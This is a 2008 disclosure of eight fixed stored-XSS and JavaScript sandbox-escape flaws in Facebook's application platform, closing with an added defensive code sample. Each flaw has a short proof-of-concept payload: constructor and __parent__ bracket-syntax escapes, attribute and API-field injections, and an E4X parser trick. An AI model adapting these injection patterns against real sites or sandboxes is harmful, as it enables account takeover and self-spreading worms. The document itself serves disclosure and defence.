Facebook stored XSS vulnerabilities

This is a summary of various Facebook security issues (script injection, persistent XSS) found and reported since June 16, 2008. As of July 4th, 2008, all of them have been fixed.

Any of these could be exploited to take over the victim’s web browser temporarily to e.g. read inbox messages, forcibly install Facebook applications, manipulate friend lists, post messages as the victim user, etc. Any of these would also allow creation of a virus/worm.

Most of the issues require the victim user to click on a profile box or visit a canvas page of an application in order to trigger the injected JavaScript. Issues 2) and 3) trigger the JavaScript without any mouse clicks.

The vulnerabilities were tested with two browsers: Firefox 3 (Linux + Windows) and Internet Explorer 7.

1) Escaping JS sandbox with literal Function constructor reference

Impact: execution of unrestricted JS on canvas pages or profiles (mouseclick required on profile pages)
Browsers: FF, IE
Description: The JS sandbox denies references to Function.constructor, but using a function literal such as “function f() { }” in the code and referring to its constructor with the “bracket syntax” was still possible. The example below uses this method and calls the constructor with a string argument, then calls the resulting Function object.
Reported: June 13, 2008
Fixed: yes
Example:

   (function f(){}["constructor"]("alert('any javascript here');"))();

2) Fb:silverlight JS injection

Impact: execution of unrestricted JS on canvas pages, profiles
Browsers: FF, IE
Description: Pretty simple XSS, described here.
Reported: June 16, 2008
Fixed: yes
Example:

  <fb:silverlight silverlightsrc="a"
   width="\" height=",any_javascript_code_here);//" />

3) Injecting JS in Feeds

Impact: execution of JS when viewing Feeds on profile page or the “home” page
Browsers: FF, IE
Description: Insufficient input validation in the publishTemplatizedAction API method. This allowed execution of sandboxed JS, so one of the sandbox-escaping techniques has to be used in order to exploit this in practice.
Reported: June 16, 2008
Fixed: yes
Example:

  # using the perl API

  $facebook->feed->publish_templatized_action( title => "My Title",
        title_template => "{actor} is testing feed stories",
        body_template => "hello",
        image_1 => "http://www.mysite.com/image.gif'\" onload=(function	f(){}['constructor']('alert(1)'))();",
        image_1_link => "http://www.mysite.com" );

4) Escaping JS sandbox with literal Number reference

Impact: execution of unrestricted JS on canvas pages or profiles (mouseclick required on profile pages)
Browsers: FF
Description: Using the “bracket syntax” to reference the __parent__ property of a floating point number to get a Window object reference, then calling its eval() to run arbitrary code. IE doesn’t support the property.
Reported: June 18, 2008
Fixed: yes
Example:

   <script>
   1.["__parent__"].eval("alert('any javascript here');");
   </script>

5) Injecting JS in video attachments

Impact: execution of unrestricted JS when an inbox, wall or forum message is viewed (mouseclick required)
Browsers: FF, IE
Description: When sharing video content with the http://www.facebook.com/sharer.php form, some input fields can be modified e.g. with JavaScript. The example below can be typed in the address bar to inject JS in a message.
Reported: June 20, 2008
Fixed: yes
Example:

  javascript:f=document.forms[0];f['attachment[params][src]'].value='#" a=b><img src="#" onerror=alert("hello")>

6) Escaping JS sandbox with E4X

Impact: execution of unrestricted JS on canvas pages or profiles (mouseclick required on profile pages). Works in browsers supporting E4X (Firefox)
Browsers: FF
Description: The JS parser in browsers supporting E4X understands XML literals, which can contain multi-line strings. Facebook’s JS sandbox didn’t expect XML or multi-line strings. The example below demonstrates how this could be used to fool the sandbox logic.
Reported: June 26, 2008
Fixed: yes
Example:

   <script>
   <x x="
   x" {alert('any javascript')}="x"
   />
   </script>

7) Escaping JS sandbox with literal String reference

Impact: execution of unrestricted JS on canvas pages or profiles (mouseclick required on profile pages)
Browsers: FF
Description: The __parent__ property of a String object can be referenced using a literal expression and the “bracket syntax” to get a Window reference.
Reported: June 21, 2008
Fixed: yes
Example:

   "a"["__parent__"].eval("alert('any javascript here');");

8) Escaping JS sandbox with literal RegExp reference

Impact: execution of unrestricted JS on canvas pages or profiles (mouseclick required on profile pages)
Browsers: FF
Description: The __parent__ property of a RegExp object can be referenced using a literal expression and the “bracket syntax” to get a Window reference.
Reported: June 21, 2008
Fixed: yes
Example:

  /a/["__parent__"].eval("alert('any javascript here');");
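Issues 1), 4), 7) and 8) share one root cause: the sandbox denied dangerous property names by how the source spelled them, and the bracket syntax spelled them differently. The following is an added example (not code from the original post or from Facebook's sandbox) contrasting a source-text denylist with a run-time check on the evaluated key; the names idx, lexicalDeny and SandboxError are chosen for this example.

```javascript
// Added example, not from the original post or from Facebook's FBJS.
// Bracket forms such as f["constructor"], "a"["__parent__"] or
// f["con" + "structor"] only reveal the dangerous name at run time, so a
// check that inspects the source text is bypassed. Routing every member
// access through idx() checks the final key value instead.

const BLOCKED = new Set(["constructor", "__parent__", "__proto__"]);

// The weak approach: scan the source text for `.constructor` / `.__parent__`.
function lexicalDeny(src) {
  return /\.(constructor|__parent__|__proto__)\b/.test(src) ? "blocked" : "allowed";
}

class SandboxError extends Error {}

// The robust approach: a rewriter turns `obj[expr]` and `obj.name` into
// idx(obj, expr) / idx(obj, "name"), so the check sees the evaluated key.
function idx(obj, key) {
  const name = String(key);            // "con" + "structor" is "constructor" here
  if (BLOCKED.has(name)) throw new SandboxError(`property "${name}" is not permitted`);
  return obj[name];
}

// Returns the accessed value, or "blocked" when the sandbox refused the key.
function guardedAccess(obj, key) {
  try { return idx(obj, key); }
  catch (e) { if (e instanceof SandboxError) return "blocked"; throw e; }
}

// Inputs mirroring the advisory's literals: a function, a number, a string, a RegExp.
function demo() {
  const f = function f() {};
  return {
    // The source-text check misses the bracket spelling used in issue 1) ...
    lexicalDot: lexicalDeny("f.constructor('alert(1)')"),          // blocked
    lexicalBracket: lexicalDeny('f["constructor"]("alert(1)")'),   // allowed (!)
    // ... while the run-time check sees the same key either way.
    dot: guardedAccess(f, "constructor"),                           // blocked
    bracket: guardedAccess(f, "con" + "structor"),                  // blocked
    numberParent: guardedAccess(1.0, "__parent__"),                 // blocked (issue 4)
    stringParent: guardedAccess("a", "__parent__"),                 // blocked (issue 7)
    regexpParent: guardedAccess(/a/, "__parent__"),                 // blocked (issue 8)
    benign: guardedAccess({ title: "My Title" }, "title"),          // "My Title"
  };
}
```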